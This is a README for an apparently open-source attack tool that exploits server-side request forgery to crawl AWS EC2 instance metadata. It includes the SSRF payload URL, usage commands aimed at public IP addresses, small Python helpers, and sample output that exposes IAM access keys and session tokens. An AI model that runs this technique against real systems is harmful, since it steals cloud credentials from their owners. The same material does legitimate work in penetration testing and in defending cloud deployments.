
AWS SSRF Metadata Crawler

A fast, asynchronous, recursive AWS metadata enumerator that exploits SSRF vulnerabilities to extract EC2 instance metadata from http://169.254.169.254.


Features

  • Recursive crawling through all metadata folders and subfolders
  • High-speed async implementation using aiohttp and asyncio
  • Nested JSON-style result structure
  • Works with any SSRF-vulnerable host reflecting a url= parameter
  • Skips HTML/noise content, stores only valid data
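The HTML-skipping behavior mentioned above can be sketched with a simple heuristic. This is an illustrative helper (the name and exact checks are assumptions, not necessarily what main.py does): metadata values are plain text, so a body that opens with an HTML document marker is treated as noise.

```python
def looks_like_html(body: str) -> bool:
    """Heuristic for discarding reflected HTML/noise pages.

    Hypothetical helper -- the actual filter in main.py may differ.
    EC2 metadata values are plain text, so anything that opens with
    an HTML document marker is treated as noise and skipped.
    """
    stripped = body.lstrip().lower()
    return stripped.startswith(("<!doctype", "<html", "<head", "<body"))
```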

Installation

git clone https://github.com/yarkhan02/aws-meta-crawler.git
cd aws-meta-crawler
pip install aiohttp

Usage

python3 main.py <target_ip>

Example

python3 main.py 61.29.101.187

Outputs structured metadata like:

{
  "iam": {
    "security-credentials": {
      "cg-ec2-role": {
        "AccessKeyId": "ASIA...",
        "SecretAccessKey": "secret...",
        "Token": "..."
      }
    }
  },
  "hostname": "ip-172-31-22-33.ec2.internal",
  ...
}
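A nested layout like the one above can be produced by splitting each crawled path on "/" and descending into a dict, creating folders as needed. A minimal sketch (the helper name is hypothetical, not taken from the tool's source):

```python
def insert_path(tree: dict, path: str, value: str) -> None:
    """Store `value` at the nested location named by `path`.

    Illustrative sketch: 'iam/security-credentials/cg-ec2-role'
    becomes tree['iam']['security-credentials']['cg-ec2-role'].
    Intermediate folders are created as empty dicts on the way down.
    """
    parts = path.strip("/").split("/")
    node = tree
    for part in parts[:-1]:
        node = node.setdefault(part, {})
    node[parts[-1]] = value

tree: dict = {}
insert_path(tree, "hostname", "ip-172-31-22-33.ec2.internal")
insert_path(tree, "iam/security-credentials/cg-ec2-role", "{...}")
```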

What This Tool Does

This crawler exploits an SSRF vulnerability in which the remote server fetches any URL passed to it, e.g.:

GET /?url=http://169.254.169.254/latest/meta-data/

It then:

  • Crawls all sub-paths and folders recursively
  • Fetches files only (not HTML)
  • Builds a nested JSON dictionary of all keys/values
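Concretely, each request is just a metadata URL wrapped in the vulnerable host's url= parameter. A rough sketch of that wrapping (the function name is illustrative; it assumes the target reflects a url= query parameter exactly as described above):

```python
from urllib.parse import quote

METADATA_BASE = "http://169.254.169.254/latest/meta-data/"

def ssrf_url(target_ip: str, meta_path: str = "") -> str:
    """Build the request URL sent to the SSRF-vulnerable host.

    Illustrative sketch: percent-encoding the inner metadata URL
    keeps it intact when embedded in the outer query string.
    """
    inner = METADATA_BASE + meta_path.lstrip("/")
    return f"http://{target_ip}/?url={quote(inner, safe='')}"
```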

Example Usage for Saving Output

python3 main.py 54.92.181.147 > metadata.json
jq . metadata.json

Arguments

Argument    Description
target_ip   IP address of the SSRF-vulnerable web service
